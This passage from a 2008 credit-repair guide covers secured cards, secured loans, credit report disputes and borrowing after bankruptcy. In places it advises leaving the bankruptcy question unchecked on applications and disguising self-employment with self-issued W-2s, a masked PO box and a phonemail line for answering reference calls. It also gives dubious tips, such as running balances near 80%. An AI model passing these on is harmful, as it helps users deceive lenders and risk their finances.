scratch. +Though secured credit cards can come in handy, be well warned +that there are sharks swimming in these waters. You'll have to ask +a ton of questions if you want to get just the right card. Make a +mistake and you'll get involved with the wrong issuer who will +waste your time or worse, they may throw your entire credit +rebuilding program off the tracks. Be careful and be prepared and +you won’t get ripped off. +First, always ask how long before they convert your secured card +into a traditional unsecured card. Six to eighteen months is the +usual range with a year being the most common time span. +Be sure to pursue the card with the best terms and at the same +time concentrate on getting a card with a major bank, not one of +those sleazy firms that only issue their secured cards to the most +credit unworthy. Those issuers have negative reputations that you +don't want listed on your credit record. Try to land a deal with a +major national bank. +1. What is the minimum deposit required? (May be as little +as $100) +2. How high can you raise the credit line? (By increasing +the securing deposit - $5,000 is the usual ceiling) +3. Do they report your payment history to the credit +bureaus? +4. If so, how do they report your payment? (As a secured +card or as an unsecured card like all the others) +5. Is there an application fee? If so how much is it? (Some +issuers cheat applicants by charging huge up-front +application fees) +6. Will they accept a previous bankruptcy? (No? walk away +and call the next card on your list) +7. Is there an annual fee? (Some charge one, many don't) +8. What will my initial credit limit be? (Will it be more than +the deposit) +9. Do they accept out of state customers? +© Copyright 2008, Ariza Research, All rights reserved - ABP - 188 - +Reproduction in any form is prohibited without written permission. + +10. When they issue you an unsecured card, will it be a +different card with a new number? (a positive for you - +another positive credit reference) +11. Do they include toll-free 24-hour customer support +(Useful for checking credit limits before making purchases) +12. What is the interest rate? (The rate will probably be +higher than usual around 14-21% is typical) +13. Will the interest rate fall with a good payment history? If +so when? +14. How do they determine the credit limit on new +unsecured cards? +You should increase your credit limit as much as possible as this +data is reported to the credit bureaus and the higher the limit the +better. +If your future unsecured credit limit will be the same as your +secured card, perhaps you should deposit as much as possible +just before your conversion is processed. In that way you can +quickly gain an impressive high-limit unsecured card credit +reference. (If you can come up with the cash) +Finding a Good Secured Credit Card +Secured cards come in a variety of different forms. The issuers +also have very different requirements. Some will issue a card +without a credit reference while others wouldn’t think of it. Some +will require that you provide pay stubs while many won’t bother. +Some charge huge up-front application fees while others think +that’s a bad business practice. +Your best move here is to shop around. Get online and spend +some time looking at the various deals that are out there. Go to +Google and search on the term “secured credit cards” but be sure +to place the phrase inside quotation marks. +If you’re in a hurry you will find several outfits online that for a +modest price will sell you a list of secured credit card offers +complete with toll-free application phone numbers. Be careful to +buy only those lists that are up to date. Many of the lists being +sold are terribly out of date. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 189 - +Reproduction in any form is prohibited without written permission. + +The Rules for Secured Credit Cards +There are a few rules to keep in mind when you use your secured +credit card. First, you must use the card on a regular basis. Just +walking around with the card in your pocket won’t do anything for +you. The best idea is to run up your outstanding balance to around +80% of the credit limit. +1. Use Your Secured Card Regularly +Don’t pay each monthly bill in full. This way you’ll pay a lot of +interest, which the bank will love you for (the interest rates on +these secured cards are very high – usually around 17-19% or +even more). +2. Always Pay Your Bill Right on Time +Be sure to pay your bill well before the due date. If you make late +payments you’re wasting you time as you’ll never build up the +good credit you’ll need to get a real unsecured credit card. +3. Never Exceed Your Credit Limit +If you go over your credit limit the bank will hold it against you. +Before making a larger purchase call the bank to be sure you +have enough credit left. +If you don’t break any of these rules, at the end of the year you +should start to receive offers for the traditional un-secured +bankcards. +You can then apply for one or more and then return your secured +card and request that they close your savings account and return +your deposit funds (plus your interest). +Or you may actually receive an offer of an unsecured card from +the same bank that issued you the secured card. That’s what +happened to me. It was great. The trust they showed in me was +deeply appreciated. +I called and cancelled my secured card, closed my deposit +savings account and got a brand new unsecured card all at the +same time. And best of all, my credit record had been completely +rebuilt. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 190 - +Reproduction in any form is prohibited without written permission. + +Sources for Secured Credit Cards +Amalgamated +$500 Min. +Bank of 800-723-0303 +Deposit +Chicago +$300 Min +U.S. Bank 800-285-8585 +Deposit +American $300 Min. +800-610-1201 +Pacific Bank Deposit +Wells Fargo $300 Min. +800-642-4720 +Bank Deposit +Plains +$300 Min. +Commerce 605-948-2344 +Deposit +Bank +Emigrant $500 Min. +800-688-2265 +Savings Bank Deposit +Union +$250 Min. +Plus/Household 800-651-5108 +Deposit +Bank +City National +$500 Min. +Bank of West 800-846-2075 +Deposit +Virginia +$300 Min. +Citibank, NA 800-950-5114 +Deposit +First Union $400 Min. +800-377-3404 +National Bank Deposit +First Premier $200 Min. +800-987-5521 +Bank Deposit +Key Bank & +800-840-5577 +Trust +© Copyright 2008, Ariza Research, All rights reserved - ABP - 191 - +Reproduction in any form is prohibited without written permission. + +Associates +$300 Min. +National Bank 800-533-5600 +Deposit +of Delaware +First Consumer $100 Min. +800-876-3262 +National Bank Deposit +$500 Min. +Capital One 800-548-4593 +Deposit +$300 Min. +Bank of Hoven 800-777-7735 +Deposit +Sterling Bank & $219 Min. +800-767-0923 +Trust Deposit +$300 Min. +JC Penney 800-533-5600 +Deposit +Lending Tree 704-944-2110 +Capital One 800-333-7116 +FCNB 858-505-9261 +© Copyright 2008, Ariza Research, All rights reserved - ABP - 192 - +Reproduction in any form is prohibited without written permission. + +Co-signing +If you have someone that trusts you completely, you might want to +try having them co-sign a one year loan that can quickly help you +create a positive credit record. (If you have someone who is willing +to co-sign for you, consider yourself very fortunate!) +But there are potential problems. You simply must keep your +payments current. If you make even a single late payment both +you and your co-signer’s credit records will suffer. +And if you do screw things up you will also lose your relationship +with your co-signers also. There’s an old saying that there’s no +quicker way to lose a friend than loaning them money. +Here’s a secret trick that can be used to accelerate the credit +reporting process. You can create a positive credit history quickly +by paying off your loan quickly. +You go through the normal loan process including the co-signing. +When you get your first loan payment bill, you can pay off the +entire balance immediately. (Do not attempt to pay anything +before the first payment due date or you will have departed from +the agreed upon loan terms which will might end up being +reported to the credit reporting agencies as a bad payment.) You’ll +save some interest but will probably end up paying most of it +despite the early pay-off. +The lender will close out the loan as “paid in full” and notify the +credit agencies. Within a month your credit file will reflect that you +had a two year loan of a certain amount that you paid off fully +without any late payments or other problems according to the +terms of the loan contract. +Fully Secured Loans +I’ve only done this once and I used a credit union at my place of +employment. I knew my credit rating was terrible so I established +both a checking and savings account with the credit union. +Six months later I wandered into their office and requested a face- +to-face meeting with one of their officers. I openly revealed my +problem. I had terrible credit and badly wanted to improve my +credit rating by creating a positive new credit agency report. +First I showed them that I had been slowly accumulating $2,000 in +my savings account and asked if they would loan me $1,500 with +my savings account balance as collateral. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 193 - +Reproduction in any form is prohibited without written permission. + +They immediately offered to provide me with the loan which would +be at an interest rate just two points higher than the interest my +savings was accumulating. The whole loan ended up costing me +less than $50. +The paperwork was very light, just two pieces of paper and a +single signature. I had to surrender my savings account booklet +until the loan was repaid. I paid the loan off within three months. +One small potential problem though. Some credit unions don’t +bother with reporting their loans to credit agencies. Since our +whole purpose here is the creation of a positive credit reference, +be sure to ask the credit union officer if they routinely report all +loans to the major credit agencies. +And later when the loan is paid off. Go back in after your loan is +paid off in full and remind them that you need the payments +reported to the major credit agencies. +Credit unions are far more helpful than your average commercial +bank. If you need to create a new credit file - they can be very +useful. +Other Tips +Since they don’t involve revolving charges, gasoline credit cards +are often easier to obtain than other credit cards. Department +store credit cards are also somewhat easier to get as the issuer is +eager to increase their sales by finding new credit customers. +Watch for special promotions. Gas cards are advertised on TV +while department store cards are pushed in the store. Keep an +eye out for special promotions and you’ll get a solid gold +opportunity to create a new credit file. +Worthless Credit Cards to Avoid +Many credit cards don’t’ bother to report transactions to the credit +reporting agencies so are worthless when it comes to creating or +rebuilding credit histories. Special purpose cards in the fields of +entertainment, travel, local shopping and gasoline often neglect to +report transactions to the credit reporting firms. Ask before you +apply. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 194 - +Reproduction in any form is prohibited without written permission. + +Dormant is Dead +When you have bad credit, you should get busy repairing it +immediately. Letting a credit file go dormant is a bad move. +Lenders, insurers and employers like to see up-to-date information +on the credit files they pay for. Stale old information turns them off. +The good news about bad or non-existent credit is this – you can +start improving it by simply making payments on time. By making +even a simple on-time payment, you start a ball rolling that will +eventually create a first rate credit rating. +The new positive information will immediately begin to replace the +old negative information. So keep your financial affairs moving in +ways that keep your credit file current – and positive. +Debt Settlement and Debt Repair Traps +Debt settlement is great for repairing bad credit provided you can +put your hands on enough cash. +If you can afford to offer a creditor at least 35-40% of the +outstanding balance, you may approach them and offer them the +lump sum in exchange for a release from the entire debt. Most +lenders will be willing to consider such an offer. (If you end up in +bankruptcy they may get exactly nothing!) +Now here is a problem that very few people know about. Should +your creditor forgive a certain amount, our friends down at the IRS +will want their share as they consider such sums as normal +income – subject to income taxes. +If you do manage to land a quick debt settlement, be sure to ask +how it will be recorded on your credit file before you write the +check. Some firms actually record the forgiven amount as being +“in arrears” which will cause great harm to your credit rating. Be +sure the account balance is fully reduced without any mention of a +deficiency. +Should your bank balance not allow such an offer, you’ll have to +beg for some relief in the form of reduced interest rates. Either +way, if you should land a deal with a credit card bank, be sure to +get the deal in writing before you complete the transaction. That +way if the bank later refuses to acknowledge the deal to the credit +reporting agency, you’ll have a document that will legally establish +that a new deal did in fact exist. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 195 - +Reproduction in any form is prohibited without written permission. + +Debt repair is a real trap. Some years ago some scam operators +found that they could clean up a credit record simply by +bombarding the credit agencies with bogus demands for the +correction of “erroneous” entries. This approach no longer works +and can actually harm your rating if you should attempt it. +The myth that a damaged credit rating can be quickly repaired by +simply hiring an expert experienced in the ways of credit is just +that – a myth, and a dangerous one at that. Avoid these people +like the proverbial plague! +Before dealing with any sort of credit related business – always +take the time to check with the better business bureau to see if +there are any complaints on file. +Also, do a Google search on the firm’s name (in quote marks) and +you will probably find a host of bitter complaints from those the +firm has victimized. +Ho Ho Ho! +At Christmas time it’s not unusual to find a table set up in the +midst of a department store floor offering instant credit cards. +During the holidays the store will be pushing especially hard to +enroll new customers so they may be more lenient when it comes +to credit standards. +Tell the nice lady at the table that you have no credit record and +would like one of their cards to help you establish one. Many of +these people are being paid on commission - which means they +can be VERY helpful. +Open Bank Accounts +Open both checking and savings accounts with a major local +bank. Though bank accounts aren’t usually mentioned on most +credit reports, having these accounts so you can list them on +credit applications can be a real positive for several different +reasons. +First having banks accounts shows that you are financial +responsible. And secondly, if you have even a small sum in your +savings account, it shows that you have plans to put away some +money that you can use later to make sure you make your +payments on time even if you should happen to fall on hard times. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 196 - +Reproduction in any form is prohibited without written permission. + +Turn Negatives in Positives +Should you be turned down for credit, be sure to ask why. Get as +much information as you can. Then be sure to use the law. When +you’ve been turned down you have the right to get a free copy of +your credit report – the one that caused the lender to back out on +you. +Again – study it carefully to see exactly what messed up the deal. +If your credit report has an obvious error on it (most files contain +substantial mistakes), call the reporting agency and demand their +official error correction form. +If the agent you speak to attempts to talk you out of challenging +the error – ignore them, they’re paid to do that. Insist on getting +the official form, fill it in completely and accurately. Then forward it +via certified mail and attach any and all supporting documentation. +Only send copies are many such forms are intentionally +misplaced. +I was turned down for a loan once because someone who had my +same name including the same middle initial had bought some +land at a tax auction in Texas and didn’t bother to follow through +on the transaction. The whole thing was right there for the world to +see on my credit report. +I called and notified them of the mistake but they were much less +than accommodating. The lady sneered at me over the phone. But +when I went through the official correction process I received a +confirmation that when they checked the social security numbers, +they discovered that the Texas man was in fact someone +completely separate from myself. +This only goes to show you that the credit people are less than +careful when it comes to posting negative information that can +destroy someone’s life. +If the credit agency treats you like dirt and won’t listen to you, +calmly inform them that in your opinion they are ignoring federal +laws and that you intend to file an official complaint with the +Federal Trade Commission. +Then follow through on your threat – the phone number of the +FTC is: (202) FTC-HELP. If the credit bureau did in fact break the +law, your complaint will get you the changes you desire and create +a real legal problem for the bureau. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 197 - +Reproduction in any form is prohibited without written permission. + +Forcing Credit Bureaus to Clean Your Credit Record For You! +Here’s another approach to forcing the credit bureaus into line. It’s +very down and dirty but it’s been used to great effect. +Launch a website that accurately lists your experiences with the +credit reporting agency. Include dates and times and best of all, +names of agents and their comments. +Do not get angry. Do not vent your spleen. Only list the actual +transactions and conversations. Then submit your new site to +Google and Yahoo (if you can afford the $299 fee). Then sit back +and wait. +Soon, very soon they will be in touch. These credit reporting love +to operate in secrecy and hate it when some lowly consumer +shines a bright light on their dirty dealings. They don’t need the +negative publicity. +Avoid Cash Advances +Credit card cash advances are expensive. Not only do they zing +you with incredibly high interest rates, they also start the interest +clock running the day of the transaction or in some cases even +earlier! Cash advances are expensive. +They also tarnish your credit record as they create the impression +of financial difficulty. Only someone who was desperate because +they don’t know how to handle money would borrow money on +such terrible terms – or so they think. +Find the Best Credit Report +If you request copies of your credit reports from the three major +credit reporting agencies, chances are you’ll be surprised to find +that what they contain varies widely. You might expect them to all +contain the same information but that’s now how it works. +If you have a black mark on your record, you may find what others +have, that your black mark may appear on one or two reports but +seldom on all three. If that’s the case with you – make up copies +of the most favorable report and keep them with you when you +apply for credit. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 198 - +Reproduction in any form is prohibited without written permission. + +Closing Out Credit Card Accounts +Here is a widely held myth that can be particularly dangerous +when trying to improve a credit record. Most people feel that +should you have an old credit card with some late payments in it’s +history – all you have to do is close out that account, chop the +card into pieces and it will be as though the card never existed. +The past payment problems will vanish forever. +If only it was that easy! In fact, the opposite is true. Many credit +card issuers will eliminate the records of late payments on a two to +three year cycle. Keep your card active and your payments +current for that long and the late payments will fall off your record +automatically. +But should you close out the account, the record of your sins will +last for a full seven years or even longer! The reverse is also true. +If you have an open account that you’re sure includes only on-time +payments, you can kill that card if you have too many open cards. +(Two to four cards seems to be the optimum number from a credit +reporting standpoint) For this reason, don’t be in a hurry to discard +those old accounts. +If you have an old card account that has a relatively good credit +record, you may want to keep it and instead close out a card with +a shorter record. In this way you’ll be retaining a longer record +which will tend to improve your credit rating. +Never close several accounts at the same time. If you have +numerous accounts you wish to close, shut them down slowly +over several months. Acting too fast will create the impression that +you anticipate financial problems. +You may want to get a current copy of your credit report a month +later just to be sure that the account you want closed has been +correctly reported as closed. If not, you’ll have to contact the +reporting agency and request they record the status change. +Excessive Debt +Lenders regard too much outstanding debt a strong negative. +They look at two factors when they judge your credit. First is your +desire to pay which is indicated by your payment history. Second +is your ability to pay which is a measure of how much income you +have, how many assets you have minus what you owe. +If you owe too much a lender will doubt your ability to repay any +future loans. If your monthly debt payments total more than 20- +25% of your take-home pay, you may have a problem. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 199 - +Reproduction in any form is prohibited without written permission. + +If you have more than five major credit cards, it will also look +rather bad for you. If you can, reduce the number to four or three +would be even better. +Divorce Traps +Should a judge or other legal entity sever your credit affairs from +that of your old spouse, you may feel you’re finally free of those +old financial entanglements. You breathe a deep sigh of relief. +Unfortunately the creditors may see things very differently. This +may allow your ex to continue to plague your financial life for +years. Their late payments could crush your ability to get a car +loan or a mortgage. Be sure to bring this subject up with your +divorce lawyer and follow their instructions. +Contact your creditors and explain the situation. Close out any +accounts that were jointly held. But some problems may surprise +you. Before splitting an account a creditor has the option of pulling +both credit records in an effort to determine their individual credit +worthiness. +Should you wish to dump a debt on the ex that created the debt, +you may run into a problem. If their credit rating, on an individual +basis, is in the eyes of the lender deficient – you may be stuck +with half or worse, all of the debt. +Pre-application Intelligence +As I’ve said, you should only apply for credit you know you’ll have +no problem obtaining. There are three major credit reporting +agencies but most lenders are members with only one. +Before applying, call their office and ask anyone you can get on +the phone which credit bureau they use. If they say they don’t +know or attempt to ignore your request – politely but firmly +demand that they find out and call you back. +Then request a copy of your file with that bureau and correct any +problems at least a month before you submit your application. In +this way you can stay on top of the entire process. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 200 - +Reproduction in any form is prohibited without written permission. + +Rebuilding Your Credit After Bankruptcy +Here are the hardcore tactics that will rebuild a credit rating even +after you’ve filed for personal bankruptcy relief. +Unless your bankruptcy is caused by illness or other +uncontrollable events, your spending habits are probably your real +problem. It's common for bankruptcy attorneys to see individuals +and couples who come back to file their second bankruptcy again +one or two years after filing their first bankruptcy. +In those cases it's clear that they didn't do any really constructive +soul searching. To be successful in rebuilding your life, you're +going to have to forever change your relationship with money and +that includes your spending habits. +It's kind of like alcoholics and their booze. If you can't or won't +change, chances are you'll just end up in the very same jam in a +few months time. +Believe me the effort is worth it, no matter how painful. Can you +imagine how great it will feel to be completely out of debt, able to +answer the phone whenever it rings, not be afraid of your mailbox +and free to think of other things than next month's bills? You made +some errors and nothing I can tell you will help one bit if you're not +ready to make some changes. +Contrary to what friends may have told you, there is credit after +bankruptcy. But like rebuilding a house after a storm, you're going +to have to do some work. +Don't think for a single moment that the world owes you +something. That your bankruptcy entitles you to some special +privileges, because it doesn't. In the eyes of the world you +screwed up. As a result the financial world has turned it's back on +you and regards you as unreliable. +Now the pressure is on you to prove to all those lenders out there +that your bankruptcy was an isolated fluke. That you are, in reality, +a responsible person who can manage your own affairs quite well, +thank you. +Two Years Exile +Now for the hard facts. Getting credit during the first 24 months +following your bankruptcy discharge will be difficult and expensive. +Today, with the number of bankruptcies swelling, a new industry +has emerged that's eager to do business with you. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 201 - +Reproduction in any form is prohibited without written permission. + +Of course, they don't trust you, will put you on a very short leash +and will charge you huge fees and very high interest rates as +you're now a high risk customer. +The good news is, you now have a second chance at life, a new +golden opportunity to rebuild your financial reputation and along +with it your entire life. Don't blow it! You can start to rebuild your +credit right away. If you use this time carefully to restore your +credit, in two years you'll be able to use credit in much the same +way everyone else does. +Quality is what you're after now. You want to open accounts with +high quality lenders. Major auto manufacturers, large banks, major +credit cards etc. +You'll want to stay completely clear of those sleazy places that +appear as though they want to help out those with poor credit. +Easy credit car lots (We finance anyone!), storefront loan +companies, payday loan outfits, and those appliance rent-to-own +places. They're vultures that will suck you dry and keep you +locked into a world of poor credit. +Having a payment record from one of them on your credit file +would be a disaster, even if the payments were made on-time. +Major lenders will notice if one of these unsavory firms appears on +your credit history and will think much less of you as a result. +Fact is, few of these parasites ever bother to report your payment +history to any credit bureau anyway. Stay away from them, now +and forever. +If you want to buy a home complete with a mortgage at normal +rates, you'll need to wait until 24 months have passed and have at +least three high quality credit references on your record each +showing a 100% on-time payment history. You'll be in good shape +then. This should be your goal during those critical first months. +If you must get credit before your 24 month anniversary, you can +expect to pay for it big time. And chances are you won't be dealing +with a major creditor. But if you must, the option is always there. +If you want a house, waiting is by far the best approach. Buying +before your 24 months are out means you'll be locked into a high +interest loan and will probably have to put down a much higher (up +to 20%) down payment which will certainly present a major hurdle +at this stage of the game. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 202 - +Reproduction in any form is prohibited without written permission. + +If you can, start to save a few bucks. I'll assume that your first +major purchase will be a car and you'll need some down payment. +$500 to $1,000 would be best. +Chapter 13 bankruptcies are terrible when it comes to rebuilding +credit. After a chapter 7 discharge you're free to pursue credit in +any way you choose. During those long repayment years under a +Chapter 13 five year long repayment plan, you'll actually have to +have court permission to apply for any kind of credit! +This is a real problem that can keep you locked in financial limbo +for years to come. This is yet another reason why chapter 7 is +preferable to chapter 13. +Some creditors will lure you in with tempting promises only to +require a co-signer at the last moment. Don't fall for this ploy. They +are taking advantage of your situation. They want to use your past +as a excuse to raise rates and down payments and then protect +themselves by forcing you to bring a friend or relative into the deal +at the last moment. Including a co-signer does nothing to help +rebuild your credit and it may even cost you a friend in the +bargain. +Where to Live +The best location for rebuilding your credit will be a large city. +There you will find bankers and others who understand where +you've been and how best they can help you and make a profit at +the same time. +You'll find much more flexibility in a large metropolitan area than +you'll ever find back home in Mayberry where the rules are often +much more restrictive. (Most small town banks will refuse to lend +money to anyone with bad credit or a bankruptcy on their record) +In your present situation large big-city car dealerships can help +you get your lease or purchase financing pushed through using +their massive purchasing power as leverage. +Next you'll definitely need a copy of your credit report from all +three of the top credit reporting bureaus. When a creditor requests +a copy the bureau records the request as an "external request". +Just having someone look at your report can count against you. +The best tactic is to carry copies of your reports with you. When +you get down to discussing loan terms, you can pull out a copy. It +will help speed things along and will help you overcome your +situation. It will also keep them from requesting tons of copies and +damaging your record in the process. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 203 - +Reproduction in any form is prohibited without written permission. + +TransUnion 800-888-4213 +Equifax 800-997-2493 +Experian 800-311-4769 +Note: These bureaus often have separate numbers they use for +complaints or error correction - ask for that number also. +If you're married you're facing a much more complicated situation +as you'll need to rebuild both credit ratings. This will take some +planning. +Be sure to spread out the applications so that both of you +accumulate the high-quality references you need. It's a common +error for a couple to concentrate on rebuilding only the man's +record. Instead be sure to file for both individual accounts in +separate names and at the same time pursue credit jointly. +Do the same with your bank accounts as you'll both need bank +references later on down the road. Check with your attorney but in +most cases it's best to pursue a mortgage in joint name. All this +will come in handy when you apply for a large loan. Having two +responsible individuals on an application will appear much more +credible than just one. +If you apply for credit and are turned down, the creditor is required +to send you a notification that lists the credit bureau(s) they used +in making their decision. You then have from one to two months to +request a copy of your report - free! +Or you can purchase copies on the web directly from the three +major agencies. (Never use other firms that offer to provide you +with a combined report listing data from all three credit reporting +agencies. This may look convenient but your most personal +information will be going through the hands of people you do not +know. There have been cases of identity theft with people who +have used these outfits) +In addition, when you personally request a copy of your report +directly from a credit agency the report is recorded as a “soft pull” +which means it won’t count against your credit rating. +But if some third party requests your report, it will be recorded as +a “hard pull” which will be recorded in the same way as any +business pull. +For this reason (and others) you should obtain your own records. I +know it’s tempting to have all three reports put together on a +single form, but that convenience comes at too high a price. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 204 - +Reproduction in any form is prohibited without written permission. + +Applying for Credit After Bankruptcy +Now we get down to brass tacks. Here are some tips on how to +approach filling out a credit application. Start out by having copies +of your bankruptcy discharge notice and your three credit bureau +reports with you when applying for credit. +Be ready to explain orally and on paper, exactly why you were +forced to resort to bankruptcy. Don't lie but you should emphasize +those factors that others can sympathize with. +If illness or a legal problem not of your making was involved even +in a minor way - mention it. But be positive, not negative. +Don't get into the "blame game" in an attempt to transfer blame for +your acts to others. This will only make you look immature and +childish. Face the music like an adult and admit that you made +mistakes but mention the other factors also - not as an excuse but +instead as an explanation. If your past includes problems with +drugs, arrests, booze, or mental health problems – keep that +information to yourself! +If you're at a loss as to what to say exactly, you might want to ask +the loan officer for some suggestions. After all he/she has seen +tons of these applications and will know what kind of language will +help grease the skids. Or you might want to ask their opinion of +what you write. Most will be willing to edit your comments in +helpful ways. +You will also be required to list your recent (since discharge) credit +history. Have this information with you preferably typed up on a +single page that you can show a loan officer. +Be truthful (except for one question we'll discuss later). The more +organized and truthful you appear now, the better. This will +increase creditor confidence in your sense of discipline. +Loan officers are like cops when they conduct interrogations. +Should they uncover a small lie, they will automatically assume +there are others perhaps even bigger ones. When every little +detail is truthful, neat and proper, they'll assume they're dealing +with an honest man. +Be sure to answer all questions. Leave no blanks as that will +subtract from the image you want to project. Should the form +include the dreaded check box with the question "have you ever +filed bankruptcy?". You'll need to decide the best course. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 205 - +Reproduction in any form is prohibited without written permission. + +I've found it constructive to leave the block unchecked and +honestly reveal my personal situation to the loan officer face to +face. +That way you've been open and honest and have placed the +whole matter in his lap. Some "company men" will fill check the +box for you but many loan officers will white-out a checked box +simply because they want the deal approved and know that the +empty-headed paper shufflers back in the home office will +automatically reject any application they receive with that +particular box checked. +Your employment record should show two trends. First, even +though it's fast becoming a dominant trend, you should avoid +changing jobs too often. And secondly, be sure to stay employed +in your same field. +Loan officers hate to see applications from job hoppers who also +hop fields. Stay put for now, at least until you get the car(s) and +home you need, then you can change jobs whenever you like. +Before applying for credit you might want to call the firm and ask +which credit reporting bureaus they use. You may find that most +businesses in your hometown use one of the three majors almost +exclusively. +On an application the following can cause you problems: +Self-employed (You can still borrow but the extensive +paperwork requirements will drive you dizzy) +No telephone listed in your name (They’ll wonder where +you really live) +Carrying too much debt (Over 35% of your income - not +including rent/mortgage) +Not a US citizen or permanent resident alien status +(You might go back to where you came from) +Lack of good employment skills (Minimum wage jobs +won't work here) +Unverifiable employment (How are they to know you +have any real income with which to repay their loan?) +Lack of good banking reference (including both checking +and savings account) +© Copyright 2008, Ariza Research, All rights reserved - ABP - 206 - +Reproduction in any form is prohibited without written permission. + +Gaps in working history/too much job switching +Here's the best way to handle being self-employed. Loan officers +accept W-2s as proof of your income and job security. W-2s make +them feel all warm and fuzzy. Any other proof is suspect and +usually unacceptable. +This is really a very silly requirement when you stop to realize how +fragile most people’s jobs really are. Many people are being laid +off or down-sized each and every day in this country. But this is +their attitude nonetheless. As a self-employed person you'll be at a +decided disadvantage if you can't give them what they want. +If your business is an unincorporated sole proprietorship or +partnership, perhaps you should consider forming a corporation as +corporate papers are much more influential in financial circles. +Check with your lawyer or accountant first and if it's in your +interest - go ahead and create a new corporation. Be sure your +new firm has a business-like name that doesn't include your +name. "National Transportation Associates, Inc." sounds much +better than "Sam Johnson Enterprises, Inc." +Then you can set yourself a fixed salary and cut your own W-2s. +Your corporate address should be one of those rented PO box +outfits like Mailboxes Etc... where you can use their street address +which will conceal the fact that you're using a PO box. +Then call your local phone company and request a "stand-alone +phonemail" number. This will give you a number that acts like an +automated answering machine. Over your phone you access the +menu and record a greeting. +The stand alone version of phone mail differs from an answering +machine in one critical way - it isn't connected to your home phone +and has it's own discreet local number (or a toll-free number for a +higher fee). +People call and leave messages. You call a separate toll-free +number to retrieve your messages. But the important thing here is +that you now have an verifiable business phone number which +adds to your image as an employee, not a self-employed person. +And if someone should call for a credit reference, you will get the +message yourself and can handle it any way you choose. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 207 - +Reproduction in any form is prohibited without written permission. + +If you make a mistake and get declined for a loan, be sure to +question them carefully to find out exactly what happened and +why. Ask them what factors went into their decision and then be +sure to obtain the free copies of your credit reports you're entitled +to. +Credit unions are great if you want a low-interest rate car loan or a +low-rate credit card but there is one problem with them. Call the +one you are considering and ask them if they report their loan +payments to the credit bureaus. +If they waffle on their answer, ask to talk to a supervisor or branch +manager. If they can't give you a solid answer, move on to the +next one. +You should also note that some creditors are more eager to deal +with you than others. Generally the largest single bank in town is +probably the most difficult place for you right now. Smaller banks +launch promotions aimed at landing new loans and accounts. +Watch your paper for ads. You'll find a much more willing banker +in one of these smaller, hungrier banks. +When you've chosen a bank you wish to open an account with, +call them first. Ask if they offer a secured MasterCard or Visa. Do +they automatically issue a debit card on new accounts (or do they +require a credit report?). Do they charge for ATM use? (some +banks charge incredible fees for simple ATM use) +After you've opened your account, you should be aware that some +banks won't allow you to have checks printed with any other +starting number above 001. This is a problem as retailers can balk +when presented with a low-numbered check. Always start your +checks off with 301 or 401 for this reason. +If the bank won't allow you to choose your own starting number, +tell them you'll have your checks printed by your own favorite +printer. Almost all printers print checks and couldn't care less what +numbers you use. (checks ordered through banks are prohibitively +expensive anyway) +How can you find a flexible banker? Call your bankruptcy lawyer +and ask for a reference. Call any friends you have that have had +financial problems in the past. Don't worry if you have to travel +cross town to get the account deal you want. Chances are that +same bank has a branch near your home which is where you'll be +doing your banking. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 208 - +Reproduction in any form is prohibited without written permission. + +One tactic is to boldly tell your hopefully flexible banker that you +have a bankruptcy in your past but are eager to rebuild your +credit. Can they offer any advice as to how their bank could help +you? +You may be pleasantly surprised to discover they have special +programs designed for people just like you! (some particularly +friendly banks offer various packages they call "Credit Builders") +Ask if they offer secured credit cards or secured loans which can +provide you with a royal road to a great new credit rating. +A secured credit card will help you obtain a traditional unsecured +card and a secured loan will require that you open a savings +account. Most credit applications ask if you have a savings +account and now you'll be able to say yes which will help boost +your credit rating. +Be sure to ask your new banker how much you'll have to have +deposited in your new account before they will waive your monthly +fee. Around $1,000-$1,500 is the norm. Some smaller savings and +loans offer fee-free banking to any and all comers. Few banks +charge ATM fees for their own ATMs. And you should always fill +out an application to cash checks at your favorite supermarket +which is a handy way to buy food and get some spending cash at +the same time. +Buying a Home With Bad Credit +First, wait two years. Getting a mortgage is possible during the +first two years but be prepared to put down either 15 or 20% in +cash. And you can expect to pay a much higher interest rate. +Wait two years, accumulate three or more high-quality credit +references and you'll do much better. And since a home mortgage +is a long term investment - it would be much wiser to bide your +time and not jump the gun. +Besides, after those first two years you'll be eligible for a FHA or +conventional mortgage under much better, even normal terms. +Most people live very frugally those first 24 months, saving as +much as they possibly can. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 209 - +Reproduction in any form is prohibited without written permission. + +If you've been busy building your credit with a minimum of three +good accounts, have paid your bills on time without fail, have +stayed employed in one field and preferably in one job, have no +negative entries in your credit files, haven't run up your debts too +much, and have sufficient income and a down payment - you +should be able to land a very nice mortgage without too much +trouble. +If you're having IRS problems, it's best to enter into some sort of +payment history at least six months before you apply for the +mortgage. This will show that you're paying it off without any +problems. But be very careful that the feds don't damage your +credit rating as any entry they cause could destroy your chances. +You might want to check and see if there are any state "first time +home buyer" programs offered where you live. Today you can +check the state's official web site and/or call them and ask. Most +states have a program or two but don't advertise them very widely +so you may stumble on a gem. +Then there is the land contract purchase. States have various +attitudes about land contracts (ask a realtor to explain your state's +position) but if your credit is shot, it may be just the thing for you. +Be extremely careful to make your payments on time. Especially +during the first year, as any late payments may lose you your new +home and your money. +After the first one or two years your lender should be convinced of +your reliability and be willing to convert your land contract into a +conventional mortgage. Realtors are your best contact for this kind +of deal. But you've got to find a creative one, one experienced +enough to know the ropes. +If you can plop down 15-20% down in cold hard cash, you can +probably get a mortgage no matter your credit rating. But be +warned that the bankers may ask you to prove where you got the +money. A friend skimmed his cash tax free from his videotape +rental store. When the banker asked about the money's source, +he was speechless. Be prepared to document every penny. +FHA assumable mortgages might work for you if you have the +"cash to mortgage" required to buy out the present owner's equity. +If you do, you can have a realtor locate suitable homes for you. If +interest rates are high when you're looking - 